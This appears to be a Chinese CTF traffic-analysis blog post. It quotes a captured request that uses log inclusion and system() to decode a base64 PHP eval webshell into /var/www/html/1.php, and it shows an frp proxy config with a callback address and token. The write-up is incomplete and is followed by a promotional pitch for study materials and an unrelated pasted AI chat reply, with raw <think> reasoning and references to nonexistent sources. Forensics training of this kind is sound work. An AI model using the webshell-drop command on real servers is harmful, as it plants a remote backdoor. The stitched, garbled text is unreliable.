CTF流量分析

思路:http.request.method ==“POST” && http contains “php”,追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system(‘echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php’)

题目三:找到攻击者使用的WebShell,并对WebShell密码计算md5,示意:md5(password),提交32位md5值为flag

题目四:黑客上传的代理工具的回连地址端口,并对地址端口计算md5,示意:md5(10.10.10.10:8080),提交32位md5值为flag

思路:先找使用了什么代理工具,再查看代理工具配置文件。http.request.method ==“POST” && http contains “php”,可以看出使用的代理工具为frp,接下来继续追踪流找frpc.ini文件内容,看写入了什么。

找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件

找到后,解密后面的16进输入。

[common] server_addr = 192.168.157.111 server_port = 8888 token=fY4e3vcrSYAHjjFKzKK8

题目五:黑客上传的代理工具socks5的账号密码,并计算账号、密码的md5,示意:md5(username#password),提交32位md5值为flag

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

s/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

<think>嗯,用户想知道在CTF竞赛中进行流量分析的技术和工具。首先,我需要回忆之前学过的相关知识,以及参考提供的引用内容。引用1提到网络流量分析需要协议知识、工具使用和识别异常行为,引用3提到了用Wireshark过滤HTTP报文并追踪流,引用2和4可能涉及学习资料和技巧。 首先,工具方面,Wireshark肯定是最常用的,用户可能需要知道如何过滤数据包,比如用http.request.method == "GET"这样的过滤语句。此外,tshark作为命令行工具可能对自动化处理有帮助。还有其他工具比如Network Miner提取文件,或者Zeek生成日志文件。这些工具的使用方法需要简要说明。 然后是分析技术,用户可能需要了解协议解析,比如HTTP、DNS、TCP等,如何识别异常流量,比如大文件传输或非常规端口。数据提取方面,比如导出传输的文件或字符串搜索flag,这里可以提到binwalk或strings命令。另外,时间戳分析可能用于隐蔽通信,比如引用3提到的追踪HTTP流的方法。 实战步骤可能需要分步讲解,比如先检查协议分层,过滤可疑流量,追踪流,提取文件,搜索关键字。这部分要结构清晰,方便用户一步步操作。 最后,相关问题的生成需要围绕技术深入、工具比较和实战案例,比如如何分析DNS隐蔽隧道,或者比较Wireshark和Tshark的优劣。要确保问题有针对性,帮助用户进一步学习。 需要检查是否符合用户不可见的指令,比如数学公式的格式是否正确,中文回答,生成问题等。还要确保引用正确,比如引用1、3和2在适当的位置添加标识。可能引用4是关于学习资料,可以放在推荐资料部分。 总结下来,回答的结构应该是先工具介绍,再技术解析,然后实战步骤,最后推荐资料和相关问题。每个部分都要简明扼要,结合实例,比如引用3中的HTTP流追踪实例,让回答更具体实用。</think>### CTF竞赛中的流量分析技术与工具指南 #### 一、核心工具 1. **Wireshark** - 功能:支持协议解析、流量过滤、数据包重组,可快速定位异常流量 - 关键操作: - 过滤语句:`http.request.method == "GET"`(HTTP请求过滤) - 数据提取:`File → Export Objects → HTTP` 提取传输文件 - 流追踪:右键数据包选择`Follow → TCP Stream/HTTP Stream`[^3] 2. **Tshark(命令行版Wireshark)** - 适用场景:自动化处理大型流量文件 - 示例命令: ```bash tshark -r capture.pcap -Y "dns.qry.name contains flag" -T fields -e dns.qry.name ``` 3. **Network Miner** - 特色功能:自动提取文件、证书、会话信息,可视化展示网络拓扑 4. **Zeek(原Bro)** - 高级应用:生成`conn.log`、`http.log`等结构化日志,支持自定义脚本检测异常行为 #### 二、关键技术 1. **协议特征分析** - HTTP协议:关注非常规状态码(如`200 OK`传输非文本内容)、非常规请求头 - DNS协议:检测`TXT`记录、超长域名请求(可能包含Base64编码数据) - TCP/UDP异常:非常规端口通信、数据包长度规律性变化 2. **隐蔽信道识别** - 时间戳分析:数据包间隔时间符合特定数学分布(如泊松分布) - 载荷隐写:通过LSB隐写、协议字段冗余位嵌入数据,需结合`binwalk`或`foremost`提取 3. **数据重组技巧** - 文件提取:通过文件签名(如`PK`对应ZIP文件)识别片段数据 - 流量镜像:使用`tcpreplay`重放流量观察系统反应 #### 三、实战操作流程 1. **初步筛查** - 执行`Statistics → Protocol Hierarchy`查看协议占比 - 过滤高频率IP:`ip.src == 192.168.1.100 && tcp.port != 80` 2. **深度分析** ```python # 示例:使用Scapy提取DNS查询记录 from scapy.all import * packets = rdpcap('dns.pcap') for pkt in packets: if pkt.haslayer(DNSQR): print(pkt[DNSQR].qname) ``` 3. **Flag提取** - 字符串搜索:`strings capture.pcap | grep -i "flag{"` - 十六进制查看:Wireshark中按`Ctrl+F`选择`Hex Value`搜索特定字节序列 #### 四、推荐学习资料 《CTF中的网络流量分析:工具、技术与实战案例》提供20+真实场景分析模板[^1],《2024网络安全学习资料》包含流量分析专项训练模块[^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值